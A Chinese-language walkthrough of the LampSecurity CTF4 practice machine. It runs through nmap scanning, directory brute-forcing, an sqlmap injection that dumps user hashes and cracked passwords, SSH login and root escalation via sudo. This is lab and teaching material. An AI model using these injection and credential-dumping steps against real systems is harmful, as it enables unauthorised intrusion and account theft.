LampSecurityCTF4靶机练习

主机发现+信息收集

nmap -sn 192.168.25.0/24

export ip=192.168.25.139

nmap --min-rate 10000 -p- $ip

PORT    STATE  SERVICE
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
631/tcp closed ipp

nmap -sT -sV -O -p22,25,80,631 $ip

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
MAC Address: 00:0C:29:ED:D6:5F (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (96%), SonicWALL embedded (93%), Control4 embedded (92%), Dell iDRAC 6 (92%), Lantronix embedded (92%), SNR embedded (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/o:dell:idrac6_firmware cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (96%), Linux 2.6.13 - 2.6.32 (95%), SonicWALL Aventail EX-6000 VPN appliance (93%), Linux 2.6.8 - 2.6.30 (92%), Control4 HC-300 home controller (92%), Linux 2.6.9 - 2.6.18 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Lantronix SLC 8 terminal server (Linux 2.6) (92%), SNR SNR-S2960 switch (92%), Linux 2.6.18 - 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix

nmap --script=vuln -p22,25,80 $ip

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-12 11:23 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.25.139 (192.168.25.139)
Host is up (0.00038s latency).
​
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.139
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.25.139:80/
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/index.html?page=search&title=Search Results
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/index.html?title=Home Page
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/index.html?page=research&title=Research
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/index.html?page=contact&title=Contact
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/index.html?page=blog&title=Blog
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=2
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=5
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=6
|     Form id: 
|     Form action: /index.html?page=search&title=Search Results
|     
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=7
|     Form id: 
|_    Form action: /index.html?page=search&title=Search Results
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.25.139:80/?page=blog&title=Blog&id=2%27%20OR%20sqlspider
|     http://192.168.25.139:80/?page=blog&title=Blog&id=5%27%20OR%20sqlspider
|     http://192.168.25.139:80/?page=blog&title=Blog&id=6%27%20OR%20sqlspider
|_    http://192.168.25.139:80/?page=blog&title=Blog&id=7%27%20OR%20sqlspider
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.php: Possible admin folder
|   /admin/login.php: Possible admin folder
|   /admin/admin.php: Possible admin folder
|   /robots.txt: Robots file
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /pages/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /restricted/: Potentially interesting folder (401 Authorization Required)
|   /sql/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|_  /usage/: Potentially interesting folder
MAC Address: 00:0C:29:ED:D6:5F (VMware)
​

web渗透

访问web

目录爆破

gobuster dir -u http://192.168.25.139/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

/images               (Status: 301) [Size: 316] [--> http://192.168.25.139/images/]
/pages                (Status: 301) [Size: 315] [--> http://192.168.25.139/pages/]
/calendar             (Status: 301) [Size: 318] [--> http://192.168.25.139/calendar/]
/mail                 (Status: 301) [Size: 314] [--> http://192.168.25.139/mail/]
/admin                (Status: 301) [Size: 315] [--> http://192.168.25.139/admin/]
/usage                (Status: 301) [Size: 315] [--> http://192.168.25.139/usage/]
/conf                 (Status: 500) [Size: 617]
/inc                  (Status: 301) [Size: 313] [--> http://192.168.25.139/inc/]
/sql                  (Status: 301) [Size: 313] [--> http://192.168.25.139/sql/]
​

尝试

http://192.168.25.139/index.html?page=blog&title=Blog&id=2%27

发现传参点，存在盲注

http://192.168.25.139/admin/

后台登录页面

http://192.168.25.139/images/

图片泄露并且暴露服务器版本号，图片没啥用

http://192.168.25.139/pages/

http://192.168.25.139/calendar/

又一个后台登录页面

search模块

http://192.168.25.139/calendar/index.php?action=search&year=2025&month=1&day=11

存在报错注入

log in 模块

http://192.168.25.139/calendar/index.php?action=login&year=2025&month=1&day=11

存在后台登录

http://192.168.25.139/mail/

SquirrelMail version 1.4.17后台登录

http://192.168.25.139/inc/

http://192.168.25.139/sql/

db数据库敏感文件泄露

use ehks;
create table user (user_id int not null auto_increment primary key, user_name varchar(20) not null, user_pass varchar(32) not null);
create table blog (blog_id int primary key not null auto_increment, blog_title varchar(255), blog_body text, blog_date datetime not null);
create table comment (comment_id int not null auto_increment primary key, comment_title varchar (50), comment_body text, comment_author varchar(50), comment_url varchar(50), comment_date datetime not null);

这个已经暴露出它的库名，表名，列名了，这样就更加方便我们的SQL注入攻击

SQLmap

自动化SQL注入工具

sqlmap -u "http://192.168.25.139/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch

+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

但在OSCP考核中不允许使用SQLmap，只能通过Burp去遍历手工盲注。

利用账号尝试登录，一共三个后台，都可以尝试登录

邮箱后台，并查看邮件

发现关键密码：password1234

密码：undone+一个数字

SSH尝试

Unable to negotiate with 192.168.25.139 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
​

没有与之密钥相匹配的方法，这是ssh兼容性问题

所以我们要进行，SSH参数补全

根据提示进行补全

ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.25.139

又提示：

host key type 使用HostKeyAlgorithms参数

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.25.139

获取初始权限

提权

信息收集

id

whoami

ls

ip addr/ifconfig

pwd

sudo -l

两个ALL的权限，权限很高的

命令：

sudo /bin/bash

直接进行提权为ROOT用户

知识

sudo -l 命令解释

sudo -l 是 Linux 系统中的一个命令，用于列出当前用户在使用 sudo 时被允许执行的命令

结果输出两个ALL时：

(ALL) ALL

• 第一个ALL表示允许用户以所有可能的身份（通常是所有系统用户身份）来执行命令。这意味着该用户可以使用sudo来模拟系统中的任何用户来运行命令。

• 第二个ALL表示用户可以使用sudo执行所有命令。例如，用户可以使用sudo来运行像apt - get update（软件包管理命令）、systemctl restart service（系统服务管理命令）等各种系统命令。

结果输出三个ALL：为Root权限